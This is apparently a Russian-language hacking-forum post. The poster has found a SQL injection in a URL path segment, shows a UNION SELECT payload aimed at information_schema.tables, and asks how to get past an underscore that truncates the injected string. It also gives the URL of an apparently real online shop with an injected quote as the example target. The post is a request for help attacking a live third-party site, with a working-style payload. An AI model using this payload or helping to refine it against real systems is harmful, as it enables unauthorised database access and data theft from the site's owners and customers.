Собственно возник такой вопрос....
Имеем инъекцию вида:
http://site.com/super_page_123_321_174.html
При
http://site.com/super_page_123_321'_174.html
Получаем тупую инъекцию в WHERE id='321''
Однако при попытке встроить туда запрос вида:
http://site.com/super_page_123_321+union+select+1,`table_name`,3+f rom+information_schema.tables+limit+1--_174.html
Получаем ошибку в связи с тем, что читается строка до символа "_". Вопрос:
Можно ли чем-то заменить этот символ в столбце\названии таблицы?
Для примера ссылка:
http://www.cafegadgets.com/dvd-players-c-63%27_174.html
Заранее спасибо!